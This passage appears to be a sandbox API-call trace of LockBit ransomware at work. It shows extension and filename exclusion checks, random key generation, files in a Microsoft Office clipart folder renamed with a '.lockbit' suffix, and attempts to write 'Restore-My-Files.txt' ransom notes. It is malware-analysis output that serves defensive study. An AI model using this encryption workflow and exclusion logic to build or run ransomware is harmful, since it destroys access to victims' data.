lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.574] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.575] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.575] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00640_.WMF.lockbit") returned 72 [0166.575] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00640_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00640_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0166.579] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.579] malloc (_Size=0x40068) returned 0x1ff1e60 [0166.579] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=45356) returned 1 [0166.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0166.580] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0166.580] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.582] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00640_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00640_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.582] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.582] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.592] free (_Block=0x1fa2ed8) [0166.592] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00640_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.592] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.592] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.592] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x883d6b00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x883d6b00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x6028, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00668_.WMF", cAlternateFileName="")) returned 1 [0166.592] lstrcmpiW (lpString1=".", lpString2="PE00668_.WMF") returned -1 [0166.592] lstrcmpiW (lpString1="..", lpString2="PE00668_.WMF") returned -1 [0166.593] PathFindExtensionW (pszPath="PE00668_.WMF") returned=".WMF" [0166.593] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.593] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.594] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.594] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00668_.WMF") returned 1 [0166.594] lstrcmpiW (lpString1="ntldr", lpString2="PE00668_.WMF") returned -1 [0166.594] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00668_.WMF") returned -1 [0166.594] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00668_.WMF") returned -1 [0166.594] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00668_.WMF") returned -1 [0166.594] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00668_.WMF") returned 1 [0166.594] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00668_.WMF") returned -1 [0166.594] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.594] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00668_.WMF") returned=".WMF" [0166.595] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.595] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.595] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.595] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00668_.WMF.lockbit") returned 72 [0166.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00668_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00668_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0166.596] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.597] malloc (_Size=0x40068) returned 0x3f70048 [0166.597] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=24616) returned 1 [0166.597] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0166.597] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0166.598] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0166.602] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00668_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00668_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.602] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.602] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.604] free (_Block=0x1fa2ed8) [0166.604] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00668_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.604] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.604] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.604] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a9c1f00, ftCreationTime.dwHighDateTime=0x1bd4b32, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3a9c1f00, ftLastWriteTime.dwHighDateTime=0x1bd4b32, nFileSizeHigh=0x0, nFileSizeLow=0x108a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00685_.WMF", cAlternateFileName="")) returned 1 [0166.604] lstrcmpiW (lpString1=".", lpString2="PE00685_.WMF") returned -1 [0166.604] lstrcmpiW (lpString1="..", lpString2="PE00685_.WMF") returned -1 [0166.604] PathFindExtensionW (pszPath="PE00685_.WMF") returned=".WMF" [0166.604] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.604] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.604] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.604] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.604] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.604] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.604] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.605] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.606] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.606] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00685_.WMF") returned 1 [0166.607] lstrcmpiW (lpString1="ntldr", lpString2="PE00685_.WMF") returned -1 [0166.607] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00685_.WMF") returned -1 [0166.607] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00685_.WMF") returned -1 [0166.607] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00685_.WMF") returned -1 [0166.607] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00685_.WMF") returned 1 [0166.607] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00685_.WMF") returned -1 [0166.607] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.607] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00685_.WMF") returned=".WMF" [0166.607] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.607] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.607] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.608] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.608] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00685_.WMF.lockbit") returned 72 [0166.608] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00685_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0166.610] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.610] malloc (_Size=0x40068) returned 0x3e70008 [0166.610] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4234) returned 1 [0166.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0166.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0166.611] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0166.928] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00685_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00685_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.928] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.928] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.140] free (_Block=0x1fa2ed8) [0167.140] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00685_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.140] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.140] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.143] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78490a00, ftCreationTime.dwHighDateTime=0x1bf0b13, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78490a00, ftLastWriteTime.dwHighDateTime=0x1bf0b13, nFileSizeHigh=0x0, nFileSizeLow=0x112e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00686_.WMF", cAlternateFileName="")) returned 1 [0167.146] lstrcmpiW (lpString1=".", lpString2="PE00686_.WMF") returned -1 [0167.146] lstrcmpiW (lpString1="..", lpString2="PE00686_.WMF") returned -1 [0167.148] PathFindExtensionW (pszPath="PE00686_.WMF") returned=".WMF" [0167.148] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.149] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.149] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.149] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.149] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.149] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.149] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.154] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.154] 